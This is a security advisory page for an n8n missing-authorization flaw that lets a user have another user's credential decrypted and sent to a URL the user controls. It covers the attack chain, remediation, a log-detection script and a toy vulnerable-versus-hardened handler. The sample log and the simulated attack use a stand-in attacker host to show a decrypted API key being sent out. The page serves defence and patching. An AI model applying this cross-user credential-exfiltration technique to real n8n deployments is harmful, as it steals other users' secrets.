CVE-2026-42226: n8n: IDOR exposes cross-user API key exfiltration

GHSA-r4v6-9fqc-w5jr (severity: UNKNOWN)
Published April 29, 2026
CISO Take

n8n's dynamic-node-parameters endpoints did not verify that the requesting user was authorized to reference a specific credential. Any authenticated user with access to a shared workflow could supply another user's credential ID and force the backend to decrypt that credential and use it against a URL the caller controls, leaking the raw API key or token. For organizations running n8n as an AI automation hub, this means every stored credential (LLM API keys, database passwords, OAuth tokens) is potentially reachable by any other authenticated user in the workspace. Predicted exploitation likelihood is currently low (EPSS 0.3%, higher than only 17% of all CVEs) and no public exploit is known, but the attack needs nothing beyond a REST client and a target credential ID, and the package carries 75 prior CVEs and an OpenSSF score of 6.6/10. Treat it as a high-priority patch. Upgrade to n8n 1.123.33, 2.17.5, or 2.18.0; until patched, audit shared workflow permissions and rotate all stored credentials.

Sources: NVD, GitHub Advisory, EPSS, OpenSSF, ATLAS

What is the risk?

HIGH. The vulnerability requires only authenticated access, not admin privileges, and is a plain missing-authorization (IDOR) bug against credential storage. In AI automation environments n8n typically holds API keys for LLM providers (OpenAI, Anthropic), vector databases, and SaaS integrations, so credential theft is high impact. No public exploit exists, but the request is trivial for anyone familiar with REST APIs to reproduce once they know a target credential ID. The low EPSS (0.3%, higher than only 17% of all CVEs) reflects predicted exploitation frequency, not ease or impact; n8n's 75 historical CVEs and moderate OpenSSF score (6.6/10) point to recurring security debt in a component that guards high-value secrets.

How does the attack unfold?

1. Credential Enumeration (AML.T0007)
   The authenticated attacker inspects accessible shared n8n workflows or enumerates the credential API to discover credential IDs belonging to other users in the workspace.
2. Authorization Bypass (AML.T0106)
   The attacker calls a dynamic-node-parameters endpoint supplying a foreign credential ID in the request body; no check ties the credential to the caller (CWE-862).
3. Forced Credential Exfiltration (AML.T0086)
   The n8n backend decrypts the target user's credential and makes a helper HTTP request to the attacker-controlled URL with the credential attached as authentication material.
4. Downstream AI Service Compromise (AML.T0055)
   The attacker reads the raw API key out of the request that arrived at their own server and uses it to access the victim's LLM provider account, vector database, or other connected AI services.

What systems are affected?

Package   Ecosystem   Vulnerable Range        Patched
n8n       npm         >= 2.17.0, < 2.17.5     2.17.5 (2.18.0 also contains the fix)
n8n       npm         < 1.123.33              1.123.33 (1.x line, per the advisory text)

Package profile: 193.4K, OpenSSF 6.6, pushed 4d ago, 54% patched, ~7d to patch

Do you run n8n with more than one user? If your version falls in the ranges above, you're affected; a single-user deployment has no other authenticated user who could reference a foreign credential.

How severe is it?

CVSS 3.1: N/A (no score assigned)
EPSS: 0.3% chance of exploitation in 30 days (higher than 17% of all CVEs)
Exploitation Status: No known exploitation
Sophistication: Trivial

What should I do?

5 steps
  1. PATCH

    Upgrade to n8n 1.123.33, 2.17.5, or 2.18.0 immediately.

  2. ROTATE

    Rotate all credentials stored in n8n (API keys, OAuth tokens, database passwords) regardless of whether exploitation is confirmed—treat all stored secrets as potentially compromised.

  3. AUDIT

    Review shared workflow permissions and restrict to minimum-privilege users pending patch deployment.

  4. DETECT

    Review n8n backend HTTP request logs, or egress proxy and firewall logs if n8n does not record helper-request destinations, for outbound calls to unexpected external URLs originating from the dynamic-node-parameters execution path. Flag any credential-bearing request to a host that is not on your allowlist for that credential type, and any user who references unusually many distinct credential IDs through those endpoints.

  5. ISOLATE

    If patching is delayed, disable shared workflow access or operate n8n in single-user mode as a temporary compensating control.
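The DETECT step above, as an added JavaScript example that is not n8n's own code: a pass over constructed JSON log lines. The field names (ts, user, route, credentialId, credentialType, url), the route prefix /rest/dynamic-node-parameters/, the per-credential-type destination allowlist and the enumeration threshold are all assumptions; map them to whatever your n8n deployment or egress proxy actually records. It flags helper requests whose destination host is not expected for the credential type, and users who reference many distinct credential IDs through these endpoints, which is the enumeration behaviour from the attack chain.

```javascript
// Added example, not n8n's own code: a detection pass over constructed log
// lines. Field names, the route prefix and the allowlist are assumptions;
// map them to what your n8n deployment or egress proxy actually records.

// Assumed: the endpoints appear under this path prefix in request logs.
const DYNAMIC_PARAMS_ROUTE = /\/dynamic-node-parameters\//;

// Assumed per-credential-type destination policy. A database credential
// should never drive an HTTP helper request at all, hence the empty list.
const EXPECTED_HOSTS = {
  openAiApi: ['api.openai.com'],
  anthropicApi: ['api.anthropic.com'],
  postgres: [],
};

// Constructed sample: one JSON object per line, as an egress proxy or an
// n8n deployment logging helper requests on behalf of a user might emit.
const SAMPLE_LOG = `
{"ts":"2026-04-30T09:12:01Z","user":"carol","route":"/rest/dynamic-node-parameters/options","credentialId":"cred-2002","credentialType":"openAiApi","url":"https://api.openai.com/v1/models"}
{"ts":"2026-04-30T09:12:44Z","user":"mallory","route":"/rest/dynamic-node-parameters/options","credentialId":"cred-1001","credentialType":"openAiApi","url":"https://collector.attacker.example/options"}
{"ts":"2026-04-30T09:13:10Z","user":"alice","route":"/rest/workflows/42/run","credentialId":"cred-1001","credentialType":"openAiApi","url":"https://api.openai.com/v1/chat/completions"}
{"ts":"2026-04-30T09:14:02Z","user":"mallory","route":"/rest/dynamic-node-parameters/resource-locator-results","credentialId":"cred-3003","credentialType":"postgres","url":"http://10.0.0.5:8080/"}
{"ts":"2026-04-30T09:14:30Z","user":"mallory","route":"/rest/dynamic-node-parameters/options","credentialId":"cred-4004","credentialType":"anthropicApi","url":"https://api.anthropic.com/v1/models"}
{"ts":"2026-04-30T09:15:12Z","user":"dave","route":"/rest/dynamic-node-parameters/options","credentialId":"cred-5005","credentialType":"slackApi","url":"https://slack.com/api/conversations.list"}
this line is not JSON and is skipped
`;

// Parses JSON lines, silently skipping anything that is not a JSON object.
function parseLines(text) {
  const entries = [];
  for (const line of text.split('\n')) {
    const trimmed = line.trim();
    if (!trimmed) continue;
    try { entries.push(JSON.parse(trimmed)); } catch { /* not JSON */ }
  }
  return entries;
}

// Hostname of a URL, or null when it cannot be parsed.
function hostOf(url) {
  try { return new URL(url).hostname; } catch { return null; }
}

// Flags helper requests made through the endpoints whose destination host
// is not what the credential type should be talking to.
function findSuspiciousRequests(entries) {
  const findings = [];
  for (const e of entries) {
    if (!DYNAMIC_PARAMS_ROUTE.test(e.route || '')) continue;
    const host = hostOf(e.url);
    const expected = EXPECTED_HOSTS[e.credentialType];
    let reason = null;
    if (host === null) {
      reason = 'unparseable destination URL';
    } else if (expected === undefined) {
      reason = `no destination policy for credential type ${e.credentialType}`;
    } else if (!expected.includes(host)) {
      reason = `destination ${host} is not allowlisted for ${e.credentialType}`;
    }
    if (reason !== null) {
      findings.push({ ts: e.ts, user: e.user, credentialId: e.credentialId, reason });
    }
  }
  return findings;
}

// Flags users who reference many distinct credential ids through these
// endpoints, the enumeration that precedes the bypass. The threshold is an
// assumption; tune it to normal editor activity in your workspace.
function findEnumerators(entries, threshold = 3) {
  const perUser = new Map();
  for (const e of entries) {
    if (!DYNAMIC_PARAMS_ROUTE.test(e.route || '')) continue;
    if (!perUser.has(e.user)) perUser.set(e.user, new Set());
    perUser.get(e.user).add(e.credentialId);
  }
  return [...perUser]
    .filter(([, ids]) => ids.size >= threshold)
    .map(([user, ids]) => ({ user, distinctCredentials: ids.size }));
}

// Runs both checks over a log text and returns the combined report.
function analyze(logText) {
  const entries = parseLines(logText);
  return { requests: findSuspiciousRequests(entries), enumerators: findEnumerators(entries) };
}

const report = analyze(SAMPLE_LOG);
console.log(JSON.stringify(report, null, 2));
```

On the sample the report names three requests (mallory's request carrying alice's OpenAI credential to the attacker host, a postgres credential driving an HTTP call to an internal address, and a credential type with no policy yet) and flags mallory as having touched three distinct credential IDs. The unknown-type finding is a policy gap rather than an attack; keep it, since an allowlist with holes is how cross-user use slips through unnoticed.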

What does CISA's SSVC say?

Decision: Track
Exploitation: none
Automatable: no
Technical Impact: partial

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

How is it classified?

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act: Article 15 - Accuracy, Robustness and Cybersecurity; Article 9 - Risk Management System
ISO 42001: A.8.3 - AI System Access Control; A.9.2 - AI System Security Testing
NIST AI RMF: GOVERN-1.2 - AI Risk Policies and Procedures; MANAGE-2.2 - Mechanisms to Sustain Risk Controls
OWASP LLM Top 10: LLM02:2025 - Sensitive Information Disclosure; LLM06:2025 - Excessive Agency

Frequently Asked Questions

What is CVE-2026-42226?

CVE-2026-42226 is a missing-authorization (IDOR) flaw in n8n's dynamic-node-parameters endpoints: the backend did not check that the authenticated caller was allowed to reference the credential ID supplied in the request body. A user with access to a shared workflow could name another user's credential together with a URL they control, and the backend would decrypt the credential and send it to that URL, leaking the raw API key or token. No public exploit is known and the EPSS is low (0.3%), but the attack needs only a REST client. Fixed in n8n 1.123.33, 2.17.5, and 2.18.0.

Is CVE-2026-42226 actively exploited?

No confirmed active exploitation of CVE-2026-42226 has been reported, but organizations should still patch proactively.

How to fix CVE-2026-42226?

1. PATCH: upgrade to n8n 1.123.33, 2.17.5, or 2.18.0. 2. ROTATE: rotate every credential stored in n8n (API keys, OAuth tokens, database passwords) whether or not exploitation is confirmed. 3. AUDIT: review shared workflow permissions and restrict them to the minimum set of users until patched. 4. DETECT: review backend HTTP request or egress logs for outbound calls from the dynamic-node-parameters path to hosts that are not on your allowlist for that credential type. 5. ISOLATE: if patching is delayed, disable shared workflow access or run n8n in single-user mode as a temporary compensating control.

What systems are affected by CVE-2026-42226?

This vulnerability affects the following AI/ML architecture patterns: AI agent frameworks, Workflow automation pipelines, Multi-tenant AI orchestration platforms, LLM integration hubs, API credential stores and secret management.

What is the CVSS score for CVE-2026-42226?

No CVSS score has been assigned yet.

What is the AI security impact?

Affected AI Architectures

AI agent frameworks; Workflow automation pipelines; Multi-tenant AI orchestration platforms; LLM integration hubs; API credential stores and secret management

MITRE ATLAS Techniques

AML.T0012 Valid Accounts
AML.T0049 Exploit Public-Facing Application
AML.T0055 Unsecured Credentials
AML.T0083 Credentials from AI Agent Configuration
AML.T0086 Exfiltration via AI Agent Tool Invocation
AML.T0106 Exploitation for Credential Access

Compliance Controls Affected

EU AI Act: Article 15, Article 9
ISO 42001: A.8.3, A.9.2
NIST AI RMF: GOVERN-1.2, MANAGE-2.2
OWASP LLM Top 10: LLM02:2025, LLM06:2025

What are the technical details?

Original Advisory

n8n is an open source workflow automation platform. Prior to versions 1.123.33 and 2.17.5, the dynamic-node-parameters endpoints did not verify whether the authenticated caller was authorized to use a supplied credential reference. An authenticated user with access to a shared workflow could supply a foreign credential ID in the request body, causing the backend to decrypt and use that credential in a helper execution path where the caller also controls the destination URL. This allowed the caller to force the backend to authenticate against attacker-controlled infrastructure using a credential belonging to another user, effectively exfiltrating a reusable API key. The issue is not limited to any single node type; any node that resolves credentials dynamically through these endpoints may be affected. This issue has been patched in versions 1.123.33, 2.17.5, and 2.18.0.

Exploitation Scenario

An attacker with a legitimate n8n account in a multi-user workspace identifies a shared workflow. Through API enumeration or inspection of accessible workflow configurations, they obtain the credential ID of a high-privilege user, such as an OpenAI API key with billing access or a database password with read/write permissions. The attacker calls a dynamic-node-parameters endpoint, supplying the foreign credential ID and a destination URL they control. The n8n backend decrypts the target user's credential and makes the helper HTTP request to the attacker's server with the credential attached in whatever form that credential type uses (for an API key, typically an Authorization header). The attacker reads the raw key out of the request their server received and uses it to access the victim's LLM account, pivot to connected data sources, or exfiltrate proprietary prompt workflows. The entire attack requires only a REST client and knowledge of the target credential ID; no special tooling or AI/ML expertise is needed.
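The flaw described in the attack chain and in the scenario above, as an added JavaScript example that is not n8n's own code: a minimal model of a "load options" handler that takes a credential ID and a destination URL from the request body. The credential store, the user names, the credential types, the decrypt stub and the handler shape are all constructed for illustration. The vulnerable variant resolves and decrypts whatever credential ID it is given; the hardened variant adds the ownership-or-sharing check whose absence is CWE-862.

```javascript
// Added example, not n8n's own code: a minimal model of the IDOR in the
// dynamic-node-parameters flow, with the missing authorization check added.
// The store, users, credential types and decrypt stub are constructed.

// Constructed credential store: each entry models an encrypted-at-rest secret
// with its owner and the users it has been explicitly shared with.
const CREDENTIAL_STORE = {
  'cred-1001': { owner: 'alice', sharedWith: [], type: 'openAiApi', ciphertext: 'enc:sk-alice-secret' },
  'cred-2002': { owner: 'bob', sharedWith: ['carol'], type: 'httpHeaderAuth', ciphertext: 'enc:bob-header-token' },
};

// Stand-in for the backend decrypt step. A real deployment uses a server-side
// encryption key; the point is that decryption happens before any check.
function decrypt(ciphertext) {
  return ciphertext.replace(/^enc:/, '');
}

// The check the vulnerable endpoint omitted: a caller may only reference a
// credential they own or that has been shared with them.
function callerMayUseCredential(callerId, cred) {
  return cred.owner === callerId || cred.sharedWith.includes(callerId);
}

// Describes the outbound helper request instead of sending it, so the leak
// is visible in the return value.
function buildOutboundRequest(cred, targetUrl) {
  return {
    url: targetUrl,
    headers: { Authorization: `Bearer ${decrypt(cred.ciphertext)}` },
  };
}

// Vulnerable shape: credential id and destination URL both come from the
// request body, and nothing ties the credential back to the caller
// (callerId is received but never consulted).
function loadOptionsVulnerable(callerId, body) {
  const cred = CREDENTIAL_STORE[body.credentialId];
  if (!cred) return { status: 404 };
  return { status: 200, request: buildOutboundRequest(cred, body.url) };
}

// Hardened shape: same inputs, but a foreign id is refused before anything
// is decrypted. "Missing" and "not yours" share a status so the endpoint
// cannot be used to confirm which credential ids exist.
function loadOptionsHardened(callerId, body) {
  const cred = CREDENTIAL_STORE[body.credentialId];
  if (!cred || !callerMayUseCredential(callerId, cred)) return { status: 404 };
  return { status: 200, request: buildOutboundRequest(cred, body.url) };
}

// Attacker "mallory" references alice's credential and points the helper
// request at a host mallory controls (constructed hostname).
const ATTACK_BODY = { credentialId: 'cred-1001', url: 'https://collector.attacker.example/options' };

// Legitimate use: carol loads options with a credential bob shared with her.
const LEGIT_BODY = { credentialId: 'cred-2002', url: 'https://api.vendor.example/v1/items' };

console.log('vulnerable:', JSON.stringify(loadOptionsVulnerable('mallory', ATTACK_BODY)));
console.log('hardened:  ', JSON.stringify(loadOptionsHardened('mallory', ATTACK_BODY)));
console.log('legit:     ', JSON.stringify(loadOptionsHardened('carol', LEGIT_BODY)));
```

Run with node: the vulnerable handler returns a request object bound for the attacker host with alice's decrypted key in the Authorization header, while the hardened one refuses mallory with 404 before decrypting and still serves carol's legitimately shared credential. Note what the check does not close: a user who has genuinely been shared a credential can still point it at a URL they control, because "may use" and "may read" collapse once the caller picks the destination. That is why rotating stored credentials stays on the remediation list even after patching.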

Weaknesses (CWE)

CWE-862 — Missing Authorization: The product does not perform an authorization check when an actor attempts to access a resource or perform an action.

  • [Architecture and Design] Divide the product into anonymous, normal, privileged, and administrative areas. Reduce the attack surface by carefully mapping roles with data and functionality. Use role-based access control (RBAC) [REF-229] to enforce the roles at the appropriate boundaries. Note that this approach may not protect against horizontal authorization, i.e., it will not protect a user from attacking others with the same role.
  • [Architecture and Design] Ensure that access control checks are performed related to the business logic. These checks may be different than the access control checks that are applied to more generic resources such as files, connections, processes, memory, and database records. For example, a database may restrict access for medical records to a specific database user, but each record might only be intended to be accessible to the patient and the patient's doctor [REF-7].

Source: MITRE CWE corpus.

Timeline

Published
April 29, 2026
Last Modified
May 4, 2026
First Seen
April 30, 2026

Related Vulnerabilities